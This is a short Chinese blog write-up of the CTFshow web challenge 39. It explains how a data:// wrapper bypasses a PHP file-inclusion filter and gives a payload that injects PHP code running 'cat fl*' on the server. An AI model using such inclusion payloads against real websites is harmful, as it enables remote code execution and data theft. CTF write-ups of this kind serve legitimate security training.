CTFshow WEB入门39

利用data://text/plain,.php因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,直接无视
payload:?c=data://text/plain,<?php system("cat fl*");?>

posted @ 2021-02-02 17:46  z1ten9  阅读(206)  评论(0)    收藏  举报